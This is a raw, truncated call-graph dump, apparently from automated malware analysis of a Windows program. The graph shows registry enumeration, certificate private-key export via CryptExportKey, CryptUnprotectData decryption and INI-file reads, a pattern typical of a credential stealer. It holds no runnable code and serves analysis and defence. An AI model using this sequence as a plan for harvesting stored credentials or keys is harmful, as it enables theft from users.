9206 406074 9204->9206 9208 4018f4 LocalFree 9206->9208 9208->9203 11004 40162c 9213->11004 9215 40a01d GetCurrentDirectoryA 9216 409f00 83 API calls 9215->9216 9217 40a058 9216->9217 9218 409f00 83 API calls 9217->9218 9219 40a074 SetCurrentDirectoryA 9218->9219 9220 40a08b 9219->9220 9220->8760 9222 406119 9221->9222 11006 4060a6 9222->11006 9225 4060a6 46 API calls 9226 406137 9225->9226 9227 4060a6 46 API calls 9226->9227 9228 406141 9227->9228 9228->8760 9230 40e719 9229->9230 11019 40e4f5 RegOpenKeyA 9230->11019 9233 40e4f5 11 API calls 9234 40e741 9233->9234 11052 40e63e RegOpenKeyA 9234->11052 9237 40e63e 31 API calls 9238 40e766 9237->9238 9238->8760 9240 40a498 9239->9240 9241 401dad 6 API calls 9240->9241 9242 40a4ae 9241->9242 9243 402469 9 API calls 9242->9243 9245 40a4d1 9242->9245 9244 40a4b8 9243->9244 9246 4045d1 41 API calls 9244->9246 9245->8760 9247 40a4cc 9246->9247 9248 4018f4 LocalFree 9247->9248 9248->9245 9250 404894 9249->9250 9251 4048b5 GetVersionExA 9250->9251 9252 4048d7 9251->9252 11087 4046ea GetModuleHandleA 9252->11087 9254 40491d 11093 40190b LocalAlloc 9254->11093 9256 404930 GetLocaleInfoA 11094 4015db 9256->11094 9258 40495f GetLocaleInfoA 9259 404988 9258->9259 11096 404752 9259->11096 9261 40498d 11104 4047ec 9261->11104 9277 40d690 9275->9277 9276 40d86d 9276->8760 9277->9276 9278 40d6fb CertOpenSystemStoreA 9277->9278 9278->9276 9286 40d715 9278->9286 9279 40d717 CertEnumCertificatesInStore 9280 40d727 CertCloseStore 9279->9280 9279->9286 9280->9276 9282 40d745 lstrcmpA 9282->9286 9284 40d77c lstrcmpA 9285 40d791 CryptAcquireCertificatePrivateKey 9284->9285 9284->9286 9285->9286 9287 40d7ae CryptGetUserKey 9285->9287 9286->9279 9286->9282 9286->9284 9288 4018f4 LocalFree 9286->9288 11164 40190b LocalAlloc 9286->11164 9289 40d7c2 CryptExportKey 9287->9289 9290 40d83a CryptReleaseContext 9287->9290 9288->9286 9291 40d831 CryptDestroyKey 9289->9291 9292 40d7db 9289->9292 9290->9286 9291->9290 11165 40190b LocalAlloc 9292->11165 9294 40d7e3 CryptExportKey 9296 40d800 9294->9296 9295 4018f4 LocalFree 9295->9291 9296->9295 9298 40f38d 9297->9298 9299 40461c 46 API calls 9298->9299 9300 40f3a7 9299->9300 9301 40461c 46 API calls 9300->9301 9302 40f3be 9301->9302 9303 40461c 46 API calls 9302->9303 9304 40f3d5 9303->9304 9305 40461c 46 API calls 9304->9305 9306 40f3ec 9305->9306 11166 40f254 9306->11166 9312 40f18c 9311->9312 11207 40ee6f RegOpenKeyA 9312->11207 9315 40ee6f 18 API calls 9316 40f1d0 9315->9316 9316->8760 9318 40c58b 9317->9318 9319 40c3fb 46 API calls 9318->9319 9320 40c59b 9319->9320 9320->8760 9322 40e787 9321->9322 9323 40c3fb 46 API calls 9322->9323 9324 40e797 9323->9324 9324->8760 9326 40c500 9325->9326 9327 40c3fb 46 API calls 9326->9327 9328 40c510 9327->9328 9329 401dad 6 API calls 9328->9329 9331 40c527 9329->9331 9330 40c56a 9330->8760 9331->9330 9332 404426 41 API calls 9331->9332 9333 40c548 9332->9333 9334 404426 41 API calls 9333->9334 9335 40c562 9334->9335 9336 4018f4 LocalFree 9335->9336 9336->9330 9338 406c7e 9337->9338 9339 40461c 46 API calls 9338->9339 9340 406c98 9339->9340 9340->8760 9342 4083fe 9341->9342 11219 4081d4 RegOpenKeyA 9342->11219 9345 4081d4 14 API calls 9346 408426 9345->9346 9346->8760 9350 40ad7c 9347->9350 9353 40a722 CoTaskMemFree 9350->9353 9354 40ada2 9350->9354 9352 40add7 9352->8760 9353->9354 11230 40ab37 CoCreateInstance 9354->11230 9356 4080fa 9355->9356 11278 407e82 RegOpenKeyA 9356->11278 9359 407e82 14 API calls 9360 408122 9359->9360 9360->8760 9362 40eb79 9361->9362 9363 40eb29 46 API calls 9362->9363 9364 40eb8e 9363->9364 9364->8760 9366 4092f9 9365->9366 11289 40929b 9366->11289 9369 40929b 46 API calls 9370 409310 9369->9370 9371 40929b 46 API calls 9370->9371 9372 40931a 9371->9372 9372->8760 9374 40a37a 9373->9374 9375 401eed 7 API calls 9374->9375 9376 40a384 9375->9376 9377 4045d1 41 API calls 9376->9377 9383 40a3a1 9376->9383 9380 40a39c 9377->9380 9378 40a3b2 StrStrIA 9378->9383 9379 40a3f7 9379->8760 9382 4018f4 LocalFree 9380->9382 9381 402469 9 API calls 9381->9383 9382->9383 9383->9378 9383->9379 9383->9381 9384 4045d1 41 API calls 9383->9384 9385 4018f4 LocalFree 9383->9385 9384->9383 9385->9383 9387 40def7 9386->9387 9388 40461c 46 API calls 9387->9388 9389 40df11 9388->9389 9389->8760 9397 40caf4 9390->9397 9391 40cb02 StrStrIA 9391->9397 9392 40cb49 9393 40461c 46 API calls 9392->9393 9395 40cb60 9393->9395 9394 402469 9 API calls 9394->9397 9396 401dad 6 API calls 9395->9396 9398 40cb77 9396->9398 9397->9391 9397->9392 9397->9394 9399 4045d1 41 API calls 9397->9399 9403 4018f4 LocalFree 9397->9403 9400 401dad 6 API calls 9398->9400 9399->9397 9401 40cb91 9400->9401 9402 401dad 6 API calls 9401->9402 9404 40cbab 9402->9404 9403->9397 9405 401dad 6 API calls 9404->9405 9410 40cbc7 9405->9410 9406 4018f4 LocalFree 9407 40cc20 9406->9407 9408 4018f4 LocalFree 9407->9408 9409 40cc28 9408->9409 9411 4018f4 LocalFree 9409->9411 9412 401607 lstrlenA 9410->9412 9420 40cc0a 9410->9420 9413 40cc30 9411->9413 9414 40cbf4 9412->9414 9416 401607 lstrlenA 9414->9416 9418 40cbff 9416->9418 9419 401607 lstrlenA 9418->9419 9419->9420 9420->9406 9422 406bf3 9421->9422 9423 40461c 46 API calls 9422->9423 9424 406c0d 9423->9424 9425 401dad 6 API calls 9424->9425 9429 406c26 9425->9429 9426 406c50 11300 40695b RegOpenKeyA 9426->11300 9428 406c5d 9428->8760 9429->9426 9430 4018f4 LocalFree 9429->9430 9430->9426 9432 40a4f2 9431->9432 9433 40461c 46 API calls 9432->9433 9434 40a50c 9433->9434 9434->8760 9436 406ff2 9435->9436 9437 40461c 46 API calls 9436->9437 9438 40700c 9437->9438 9438->8760 9440 40162c 9439->9440 9441 4052f5 GetWindowsDirectoryA 9440->9441 9442 405311 9441->9442 9443 4053b4 9441->9443 9442->9443 9445 401e34 5 API calls 9442->9445 9444 401eed 7 API calls 9443->9444 9446 4053bb 9444->9446 9447 40532d GetPrivateProfileStringA 9445->9447 9448 4053db 9446->9448 9449 401e88 6 API calls 9446->9449 9450 40535d 9447->9450 9451 40536e GetPrivateProfileStringA 9447->9451 11340 405294 9448->11340 9453 4053ca 9449->9453 9454 405108 31 API calls 9450->9454 9456 405398 9451->9456 9457 4053a9 9451->9457 11312 405108 9453->11312 9454->9451 9460 405108 31 API calls 9456->9460 9461 4018f4 LocalFree 9457->9461 9459 405294 36 API calls 9463 4053f9 9459->9463 9460->9457 9461->9443 9465 405294 36 API calls 9463->9465 9464 4018f4 LocalFree 9464->9448 9466 405408 9465->9466 9466->8760 9468 40dc71 9467->9468 11354 40dc23 9468->11354 9471 40dc23 46 API calls 9472 40dc88 9471->9472 9473 40dc23 46 API calls 9472->9473 9474 40dc92 9473->9474 9475 40461c 46 API calls 9474->9475 9476 40dca9 9475->9476 9476->8760 9478 40c5ed 9477->9478 9479 40c3fb 46 API calls 9478->9479 9480 40c5fd 9479->9480 9480->8760 9482 40a2ec 9481->9482 9483 401dad 6 API calls 9482->9483 9484 40a306 9483->9484 9485 40a323 9484->9485 9486 4045d1 41 API calls 9484->9486 9487 401dad 6 API calls 9485->9487 9488 40a31e 9486->9488 9489 40a33a 9487->9489 9491 4018f4 LocalFree 9488->9491 9490 40a357 9489->9490 9492 4045d1 41 API calls 9489->9492 9490->8760 9491->9485 9493 40a352 9492->9493 9494 4018f4 LocalFree 9493->9494 9494->9490 9496 40e16b 9495->9496 11363 40df20 RegOpenKeyA 9496->11363 9499 40df20 14 API calls 9500 40e193 9499->9500 9500->8760 9502 40d26b 9501->9502 11374 40cf98 9502->11374 9505 401eed 7 API calls 9506 40d27d 9505->9506 9507 404426 41 API calls 9506->9507 9508 40d29f 9506->9508 9509 40d29a 9507->9509 9508->8760 9510 4018f4 LocalFree 9509->9510 9510->9508 9515 40566b 9511->9515 9512 4056b4 11397 4055af 9512->11397 9513 405679 StrStrIA 9513->9515 9515->9512 9515->9513 9517 402469 9 API calls 9515->9517 9524 4018f4 LocalFree 9515->9524 11431 405478 9515->11431 9517->9515 9518 4055af 34 API calls 9519 4056c8 9518->9519 9520 4055af 34 API calls 9519->9520 9522 4056d2 9520->9522 9523 4055af 34 API calls 9522->9523 9525 4056dc 9523->9525 9524->9515 11426 40542e 9525->11426 9528 40542e 6 API calls 9529 4056f6 9528->9529 9541 407867 9540->9541 11458 407673 RegOpenKeyA 9541->11458 9544 407673 14 API calls 9545 40788f 9544->9545 9545->8760 9547 40b2e6 9546->9547 11469 40b199 RegOpenKeyA 9547->11469 9549 40b2f6 9549->8760 9551 40da66 9550->9551 11557 40d87e RegOpenKeyA 9551->11557 9553 40da76 9553->8760 9555 40162c 9554->9555 9556 40a268 GetCurrentDirectoryA 9555->9556 9557 409f00 83 API calls 9556->9557 9558 40a2a3 9557->9558 9559 409f00 83 API calls 9558->9559 9560 40a2bf SetCurrentDirectoryA 9559->9560 9561 40a2d6 9560->9561 9561->8760 9563 40ebe5 9562->9563 9564 401dad 6 API calls 9563->9564 9565 40ebff 9564->9565 9566 40ec1c 9565->9566 9567 4045d1 41 API calls 9565->9567 9568 401dad 6 API calls 9566->9568 9569 40ec17 9567->9569 9571 40ec32 9568->9571 9570 4018f4 LocalFree 9569->9570 9570->9566 9572 40ec4f 9571->9572 9573 4045d1 41 API calls 9571->9573 9574 401dad 6 API calls 9572->9574 9575 40ec4a 9573->9575 9576 40ec66 9574->9576 9578 4018f4 LocalFree 9575->9578 9577 40ec83 9576->9577 9579 4045d1 41 API calls 9576->9579 9580 401dad 6 API calls 9577->9580 9578->9572 9581 40ec7e 9579->9581 9582 40ec99 9580->9582 9583 4018f4 LocalFree 9581->9583 9584 40ecb6 9582->9584 9585 4045d1 41 API calls 9582->9585 9583->9577 9584->8760 9586 40ecb1 9585->9586 9587 4018f4 LocalFree 9586->9587 9587->9584 9589 407364 9588->9589 11568 40701b RegOpenKeyA 9589->11568 9592 401dad 6 API calls 9593 40738b 9592->9593 9594 4073a9 9593->9594 9595 401e88 6 API calls 9593->9595 9596 401eed 7 API calls 9594->9596 9597 40739a 9595->9597 9598 4073b0 9596->9598 9599 407287 20 API calls 9597->9599 9600 4073d9 9598->9600 9603 401e88 6 API calls 9598->9603 9602 4073a4 9599->9602 9601 401eed 7 API calls 9600->9601 9604 4073e0 9601->9604 9605 4018f4 LocalFree 9602->9605 9606 4073bf 9603->9606 9607 407409 9604->9607 9609 401e88 6 API calls 9604->9609 9605->9594 9608 401e88 6 API calls 9606->9608 9610 401eed 7 API calls 9607->9610 9611 4073ca 9608->9611 9612 4073ef 9609->9612 9613 407410 9610->9613 11579 407287 9611->11579 9615 401e88 6 API calls 9612->9615 9616 407439 9613->9616 9619 401e88 6 API calls 9613->9619 9618 4073fa 9615->9618 9616->8760 9617 4073d4 9620 4018f4 LocalFree 9617->9620 9622 407287 20 API calls 9618->9622 9621 40741f 9619->9621 9620->9600 9623 401e88 6 API calls 9621->9623 9624 407404 9622->9624 9625 40742a 9623->9625 9626 4018f4 LocalFree 9624->9626 9627 407287 20 API calls 9625->9627 9626->9607 9631 407963 9630->9631 11605 40789e RegOpenKeyA 9631->11605 9634 40789e 9 API calls 9635 40798b 9634->9635 9636 40789e 9 API calls 9635->9636 9637 40799e 9636->9637 9638 40789e 9 API calls 9637->9638 9639 4079b0 9638->9639 9639->8760 9641 404ee3 9640->9641 11613 40190b LocalAlloc 9641->11613 9643 404f05 GetWindowsDirectoryA 9644 404f19 9643->9644 9645 404f2d 9643->9645 9644->9645 9646 404f20 9644->9646 9647 4018f4 LocalFree 9645->9647 11614 404d9e 9646->11614 9648 404f2b 9647->9648 9650 401eed 7 API calls 9648->9650 9651 404f3c 9650->9651 9652 404d9e 28 API calls 9651->9652 9653 404f45 9652->9653 9654 401eed 7 API calls 9653->9654 9655 404f4c 9654->9655 9656 404f64 9655->9656 9657 401e88 6 API calls 9655->9657 9658 401eed 7 API calls 9656->9658 9659 404f5b 9657->9659 9660 404f6b 9658->9660 9661 404d9e 28 API calls 9659->9661 9662 404f83 9660->9662 9664 401e88 6 API calls 9660->9664 9661->9656 9663 401eed 7 API calls 9662->9663 9666 404f8a 9663->9666 9665 404f7a 9664->9665 9667 404d9e 28 API calls 9665->9667 9668 404fa2 9666->9668 9669 401e88 6 API calls 9666->9669 9667->9662 9713 40162c 9712->9713 9714 40a1e1 GetCurrentDirectoryA 9713->9714 9715 409f00 83 API calls 9714->9715 9716 40a21c 9715->9716 9717 409f00 83 API calls 9716->9717 9718 40a238 SetCurrentDirectoryA 9717->9718 9719 40a24f 9718->9719 9719->8760 9724 407d5f 9720->9724 9721 407d77 StrStrA 9723 407dd0 StrStrIA 9721->9723 9721->9724 9722 407e2e 11669 407cff 9722->11669 9723->9724 9724->9721 9724->9722 9726 407d8c lstrlenA 9724->9726 9730 402469 9 API calls 9724->9730 9732 4045d1 41 API calls 9724->9732 9738 4018f4 LocalFree 9724->9738 9728 402469 9 API calls 9726->9728 9728->9724 9729 407cff 46 API calls 9731 407e42 9729->9731 9730->9724 9733 407cff 46 API calls 9731->9733 9732->9724 9734 407e4c 9733->9734 11680 407b94 RegOpenKeyA 9734->11680 9737 407b94 48 API calls 9739 407e71 9737->9739 9738->9724 9739->8760 9741 4061db 9740->9741 11691 406150 9741->11691 9744 406150 46 API calls 9745 406209 9744->9745 9745->8760 9747 40cc5a 9746->9747 9748 401dad 6 API calls 9747->9748 9749 40cc70 9748->9749 9750 402469 9 API calls 9749->9750 9751 40cc97 9749->9751 9752 40cc7a 9750->9752 9751->8760 9752->9751 9753 4045d1 41 API calls 9752->9753 9754 40cc92 9753->9754 9755 4018f4 LocalFree 9754->9755 9755->9751 9757 40162c 9756->9757 9758 40a15a GetCurrentDirectoryA 9757->9758 9759 409f00 83 API calls 9758->9759 9760 40a195 9759->9760 9761 409f00 83 API calls 9760->9761 9762 40a1b1 SetCurrentDirectoryA 9761->9762 9763 40a1c8 9762->9763 9763->8760 9765 40c9c0 9764->9765 11706 40c93d 9765->11706 9768 40c93d 46 API calls 9769 40c9d7 9768->9769 9770 40c93d 46 API calls 9769->9770 9771 40c9e1 9770->9771 9771->8760 9773 40e8cf 9772->9773 9774 40461c 46 API calls 9773->9774 9775 40e8e9 9774->9775 9775->8760 9777 40c4cf 9776->9777 9778 40c3fb 46 API calls 9777->9778 9779 40c4df 9778->9779 9779->8760 9781 40ce44 9780->9781 9782 401dad 6 API calls 9781->9782 9783 40ce5a 9782->9783 9784 40ce9d 9783->9784 9785 40ce5e StrStrIA 9783->9785 9784->8760 9786 40ce72 9785->9786 9787 40ce95 9785->9787 9789 402469 9 API calls 9786->9789 9788 4018f4 LocalFree 9787->9788 9788->9784 9790 40ce7a 9789->9790 9791 404426 41 API calls 9790->9791 9792 40ce90 9791->9792 9793 4018f4 LocalFree 9792->9793 9793->9787 9795 40162c 9794->9795 9796 408146 GetWindowsDirectoryA 9795->9796 9797 40815e 9796->9797 9798 40818a 9796->9798 9797->9798 9799 401e34 5 API calls 9797->9799 9798->8760 9800 408176 9799->9800 9801 4042ec 16 API calls 9800->9801 9802 408185 9801->9802 9803 4018f4 LocalFree 9802->9803 9803->9798 9805 406fc1 9804->9805 11723 406de7 RegOpenKeyA 9805->11723 9807 406fd1 9807->8760 9809 40cebe 9808->9809 9810 40461c 46 API calls 9809->9810 9811 40ced8 9810->9811 9811->8760 9813 40162c 9812->9813 9814 40fb42 GetCurrentDirectoryA 9813->9814 9815 409f00 83 API calls 9814->9815 9816 40fb7d 9815->9816 9817 409f00 83 API calls 9816->9817 9818 40fb99 SetCurrentDirectoryA GetCurrentDirectoryA 9817->9818 9819 409f00 83 API calls 9818->9819 9820 40fbdd 9819->9820 9821 409f00 83 API calls 9820->9821 9822 40fbf9 SetCurrentDirectoryA 9821->9822 9823 40fc10 9822->9823 9823->8760 9825 406dbe 9824->9825 9826 40461c 46 API calls 9825->9826 9827 406dd8 9826->9827 9827->8760 9829 40c5bc 9828->9829 9830 40c3fb 46 API calls 9829->9830 9831 40c5cc 9830->9831 9831->8760 9833 401905 9832->9833 9834 4018fd LocalFree 9832->9834 9833->8843 9834->9833 9836 406926 9835->9836 9845 4066ec 9835->9845 9836->8849 9837 4066f3 RegEnumKeyExA 9838 40671c RegCloseKey 9837->9838 9837->9845 9838->9836 9842 401dad 6 API calls 9842->9845 9843 401607 lstrlenA 9843->9845 9844 4018f4 LocalFree 9844->9845 9845->9837 9845->9842 9845->9843 9845->9844 9846 401e34 9845->9846 9851 401e88 9845->9851 9847 401e3e lstrlenA lstrlenA 9846->9847 9859 40190b LocalAlloc 9847->9859 9850 401e6d lstrcpyA lstrcatA 9850->9845 9852 401e92 lstrlenA lstrlenA 9851->9852 9860 40190b LocalAlloc 9852->9860 9855 401ec1 lstrcpyA lstrcatA 9856 401ee6 9855->9856 9857 401ede 9855->9857 9856->9845 9858 4018f4 LocalFree 9857->9858 9858->9856 9859->9850 9860->9855 9862 407626 9861->9862 9869 407468 9861->9869 9862->8854 9863 40746f RegEnumKeyExA 9864 407498 RegCloseKey 9863->9864 9863->9869 9864->9862 9866 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 9866->9869 9867 401dad 6 API calls 9867->9869 9868 4018f4 LocalFree 9868->9869 9869->9863 9869->9866 9869->9867 9869->9868 9870 401607 lstrlenA 9869->9870 9871 407448 11 API calls 9869->9871 9870->9869 9871->9869 9886 4045eb 9872->9886 9875 4045eb 46 API calls 9876 404645 9875->9876 9877 4045eb 46 API calls 9876->9877 9878 404658 9877->9878 9879 401dad 9878->9879 9880 401db9 9879->9880 9905 401cc9 9880->9905 9895 401eed 9886->9895 9889 404618 9889->9875 9890 401e88 6 API calls 9891 404603 9890->9891 9892 4045d1 41 API calls 9891->9892 9893 404613 9892->9893 9894 4018f4 LocalFree 9893->9894 9894->9889 9904 40190b LocalAlloc 9895->9904 9897 401efe 9898 401f0a 9897->9898 9899 401f0c SHGetFolderPathA 9897->9899 9900 4018f4 LocalFree 9898->9900 9899->9898 9903 401f5d 9899->9903 9901 401f2a 9900->9901 9902 401dad 6 API calls 9901->9902 9901->9903 9902->9901 9903->9889 9903->9890 9904->9897 9906 401cd7 RegOpenKeyExA 9905->9906 9908 401d86 9906->9908 9909 401d17 RegQueryValueExA 9906->9909 9910 401da8 9908->9910 9913 401cc9 2 API calls 9908->9913 9911 401d32 9909->9911 9912 401d7e RegCloseKey 9909->9912 9911->9912 9912->9908 9913->9910 10173 401eed 7 API calls 10172->10173 10175 40c9fb 10173->10175 10174 40ca23 10174->8872 10175->10174 10176 401e88 6 API calls 10175->10176 10177 40ca0a 10176->10177 10178 4045d1 41 API calls 10177->10178 10179 40ca1e 10178->10179 10180 4018f4 LocalFree 10179->10180 10180->10174 10182 40f9fd 10181->10182 10183 40f9e3 10181->10183 10185 40f5f5 RegOpenKeyA 10182->10185 10183->10182 10205 40a722 10183->10205 10186 40f68e 10185->10186 10192 40f611 10185->10192 10186->8882 10187 40f618 RegEnumKeyExA 10188 40f641 RegCloseKey 10187->10188 10187->10192 10188->10186 10190 401e34 5 API calls 10190->10192 10191 401e88 6 API calls 10191->10192 10192->10187 10192->10190 10192->10191 10194 4018f4 LocalFree 10192->10194 10218 40f460 10192->10218 10194->10192 10196 40f738 10195->10196 10203 40f6b2 10195->10203 10196->8886 10197 40f6b9 RegEnumKeyExA 10198 40f6e2 RegCloseKey 10197->10198 10197->10203 10198->10196 10200 401e34 5 API calls 10200->10203 10201 401e88 6 API calls 10201->10203 10202 40f5f5 23 API calls 10202->10203 10203->10197 10203->10200 10203->10201 10203->10202 10204 4018f4 LocalFree 10203->10204 10204->10203 10208 40a742 10205->10208 10206 40a797 10206->10182 10208->10206 10209 40a68c 10208->10209 10212 40a6af 10209->10212 10210 40a70c 10210->10208 10212->10210 10213 40a606 10212->10213 10214 40a613 10213->10214 10216 40a618 10213->10216 10214->10212 10215 40a67c 10215->10212 10216->10215 10217 40a66b CoTaskMemFree 10216->10217 10217->10216 10220 40f470 10218->10220 10219 401dad 6 API calls 10219->10220 10220->10219 10223 4018f4 LocalFree 10220->10223 10226 40f4ac 10220->10226 10237 40f416 10220->10237 10222 401dad 6 API calls 10222->10226 10223->10220 10225 401dad 6 API calls 10228 40f503 10225->10228 10226->10222 10226->10228 10229 4018f4 LocalFree 10226->10229 10246 401607 10226->10246 10227 40f584 10231 401dad 6 API calls 10227->10231 10233 40f5db 10227->10233 10235 401607 lstrlenA 10227->10235 10236 4018f4 LocalFree 10227->10236 10228->10225 10228->10227 10230 4018f4 LocalFree 10228->10230 10234 40f416 6 API calls 10228->10234 10249 40465c 10228->10249 10229->10226 10230->10228 10231->10227 10233->10192 10234->10228 10235->10227 10236->10227 10255 402b08 10237->10255 10239 40f457 10239->10220 10240 40f427 10240->10239 10241 401607 lstrlenA 10240->10241 10242 40f444 10241->10242 10243 401607 lstrlenA 10242->10243 10244 40f44f 10243->10244 10245 4018f4 LocalFree 10244->10245 10245->10239 10247 401610 lstrlenA 10246->10247 10248 40161a 10246->10248 10247->10248 10248->10226 10250 4046e1 10249->10250 10251 404685 10249->10251 10250->10228 10251->10250 10252 4046a2 CryptUnprotectData 10251->10252 10252->10250 10253 4046b2 10252->10253 10253->10250 10254 4046d9 LocalFree 10253->10254 10254->10250 10256 402b11 10255->10256 10257 402b17 10255->10257 10256->10257 10258 402b1d IsTextUnicode 10256->10258 10257->10240 10259 402b3e 10258->10259 10260 402b2e 10258->10260 10274 40190b LocalAlloc 10259->10274 10264 402a8b 10260->10264 10263 402b3c 10263->10240 10265 402a98 10264->10265 10266 402a9f WideCharToMultiByte 10264->10266 10265->10263 10267 402aee 10266->10267 10268 402abc 10266->10268 10267->10263 10275 40190b LocalAlloc 10268->10275 10270 402ac7 10270->10267 10271 402acb WideCharToMultiByte 10270->10271 10271->10267 10272 402ae8 10271->10272 10274->10263 10275->10270 10277 401eed 7 API calls 10276->10277 10278 4079ca 10277->10278 10279 407a1c 10278->10279 10280 401e88 6 API calls 10278->10280 10279->8916 10281 4079d9 10280->10281 10282 4045d1 41 API calls 10281->10282 10283 4079ef 10282->10283 10284 4045d1 41 API calls 10283->10284 10285 407a03 10284->10285 10286 4045d1 41 API calls 10285->10286 10287 407a17 10286->10287 10288 4018f4 LocalFree 10287->10288 10288->10279 10290 401eed 7 API calls 10289->10290 10291 407a70 10290->10291 10292 407b1b 10291->10292 10293 407a8c 10291->10293 10294 401e88 6 API calls 10291->10294 10292->8924 10295 401e34 5 API calls 10293->10295 10294->10293 10296 407a9c 10295->10296 10297 4042ec 16 API calls 10296->10297 10298 407aab 10297->10298 10299 4018f4 LocalFree 10298->10299 10300 407ab0 10299->10300 10301 401e34 5 API calls 10300->10301 10302 407abd 10301->10302 10303 4042ec 16 API calls 10302->10303 10304 407acc 10303->10304 10305 4018f4 LocalFree 10304->10305 10306 407ad1 10305->10306 10307 401e34 5 API calls 10306->10307 10308 407ade 10307->10308 10321 401dad 6 API calls 10320->10321 10322 40eb44 10321->10322 10323 40eb63 10322->10323 10327 40eadd 10322->10327 10323->8937 10326 4018f4 LocalFree 10326->10323 10334 40eaa7 10327->10334 10330 40eaa7 46 API calls 10331 40eb0e 10330->10331 10332 40eaa7 46 API calls 10331->10332 10333 40eb25 10332->10333 10333->10326 10335 401eed 7 API calls 10334->10335 10336 40eab2 10335->10336 10337 40ead9 10336->10337 10338 401e88 6 API calls 10336->10338 10337->10330 10339 40eabf 10338->10339 10340 404426 41 API calls 10339->10340 10341 40ead4 10340->10341 10342 4018f4 LocalFree 10341->10342 10342->10337 10344 40de98 10343->10344 10353 40dcd8 10343->10353 10344->8942 10345 40dcdf RegEnumKeyExA 10346 40dd08 RegCloseKey 10345->10346 10345->10353 10346->10344 10348 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10348->10353 10349 401dad 6 API calls 10349->10353 10350 40dcb8 11 API calls 10350->10353 10351 4018f4 LocalFree 10351->10353 10352 401607 lstrlenA 10352->10353 10353->10345 10353->10348 10353->10349 10353->10350 10353->10351 10353->10352 10355 406694 10354->10355 10362 4064d3 10354->10362 10355->8957 10356 4064da RegEnumKeyExA 10357 406503 RegCloseKey 10356->10357 10356->10362 10357->10355 10359 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10359->10362 10360 4018f4 LocalFree 10360->10362 10361 401dad 6 API calls 10361->10362 10362->10356 10362->10359 10362->10360 10362->10361 10363 401607 lstrlenA 10362->10363 10364 4064b0 11 API calls 10362->10364 10363->10362 10364->10362 10366 40d585 10365->10366 10372 40d350 10365->10372 10366->8962 10367 40d357 RegEnumKeyExA 10368 40d380 RegCloseKey 10367->10368 10367->10372 10368->10366 10370 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10370->10372 10371 401dad 6 API calls 10371->10372 10372->10367 10372->10370 10372->10371 10373 40465c 2 API calls 10372->10373 10374 4018f4 LocalFree 10372->10374 10375 401607 lstrlenA 10372->10375 10376 40d330 13 API calls 10372->10376 10373->10372 10374->10372 10375->10372 10376->10372 10378 401dad 6 API calls 10377->10378 10382 40d5a5 10378->10382 10379 40d614 10379->8966 10380 40d60f 10381 4018f4 LocalFree 10380->10381 10381->10379 10382->10379 10382->10380 10383 40d5c7 wsprintfA 10382->10383 10385 4042ec 16 API calls 10382->10385 10386 4018f4 LocalFree 10382->10386 10384 401dad 6 API calls 10383->10384 10384->10382 10385->10382 10386->10382 10388 401e34 5 API calls 10387->10388 10389 402478 lstrlenA 10388->10389 10390 402496 StrStrIA 10389->10390 10391 402487 10389->10391 10392 4024a5 10390->10392 10393 4024a9 StrRChrIA 10390->10393 10391->10390 10392->10393 10394 4024b7 lstrlenA 10393->10394 10396 4024ca 10394->10396 10396->8969 10398 406413 10397->10398 10404 40623b 10397->10404 10398->9001 10399 406242 RegEnumKeyExA 10400 40626b RegCloseKey 10399->10400 10399->10404 10400->10398 10402 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10402->10404 10403 401dad 6 API calls 10403->10404 10404->10399 10404->10402 10404->10403 10405 4018f4 LocalFree 10404->10405 10406 401607 lstrlenA 10404->10406 10405->10404 10406->10404 10408 4090d1 10407->10408 10415 409006 10407->10415 10408->9009 10409 40900d RegEnumKeyExA 10410 409036 RegCloseKey 10409->10410 10409->10415 10410->10408 10412 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10412->10415 10413 401dad 6 API calls 10413->10415 10415->10409 10415->10412 10415->10413 10416 408fe6 11 API calls 10415->10416 10417 4018f4 LocalFree 10415->10417 10433 4042c3 10415->10433 10416->10415 10417->10415 10419 409213 10418->10419 10432 4090f5 10418->10432 10419->9013 10420 4090fc RegEnumKeyExA 10421 409125 RegCloseKey 10420->10421 10420->10432 10421->10419 10423 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10423->10432 10424 4018f4 LocalFree 10424->10432 10425 401dad 6 API calls 10425->10432 10426 402469 9 API calls 10426->10432 10428 4090d5 50 API calls 10428->10432 10429 4045d1 41 API calls 10431 409179 10429->10431 10430 4018f4 LocalFree 10430->10432 10431->10429 10431->10430 10437 401fbb 10431->10437 10432->10420 10432->10423 10432->10424 10432->10425 10432->10426 10432->10428 10432->10431 10434 4042e8 10433->10434 10435 4042cc 10433->10435 10434->10415 10435->10434 10436 401607 lstrlenA 10435->10436 10436->10434 10438 401fc5 10437->10438 10439 401fca 10437->10439 10438->10439 10440 401fd3 GetFileAttributesA 10438->10440 10439->10431 10441 401fe0 10440->10441 10441->10431 10443 404d11 10442->10443 10449 404bbe 10442->10449 10443->9019 10444 404bc5 RegEnumKeyExA 10445 404bee RegCloseKey 10444->10445 10444->10449 10445->10443 10447 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10447->10449 10448 401dad 6 API calls 10448->10449 10449->10444 10449->10447 10449->10448 10450 4018f4 LocalFree 10449->10450 10451 404b9b 11 API calls 10449->10451 10452 401607 lstrlenA 10449->10452 10450->10449 10451->10449 10452->10449 10454 404b97 10453->10454 10460 404ab0 10453->10460 10454->9025 10455 404ab7 RegEnumValueA 10456 404ae5 RegCloseKey 10455->10456 10455->10460 10456->10454 10458 404b01 StrStrIA 10458->10460 10459 401dad 6 API calls 10459->10460 10460->10455 10460->10458 10460->10459 10461 4018f4 LocalFree 10460->10461 10461->10460 10463 409f15 10462->10463 10464 409f6c 10462->10464 10465 401dad 6 API calls 10463->10465 10493 40190b LocalAlloc 10464->10493 10467 409f27 10465->10467 10467->10464 10470 402469 9 API calls 10467->10470 10468 409f76 RegOpenKeyA 10469 409ffc 10468->10469 10479 409f8c 10468->10479 10471 4018f4 LocalFree 10469->10471 10473 409f32 10470->10473 10474 40a004 10471->10474 10472 409f93 RegEnumKeyExA 10475 409fb8 RegCloseKey 10472->10475 10472->10479 10476 409f67 10473->10476 10481 401eed 7 API calls 10473->10481 10474->9038 10475->10469 10480 4018f4 LocalFree 10476->10480 10478 401e34 5 API calls 10478->10479 10479->10472 10479->10478 10482 401e88 6 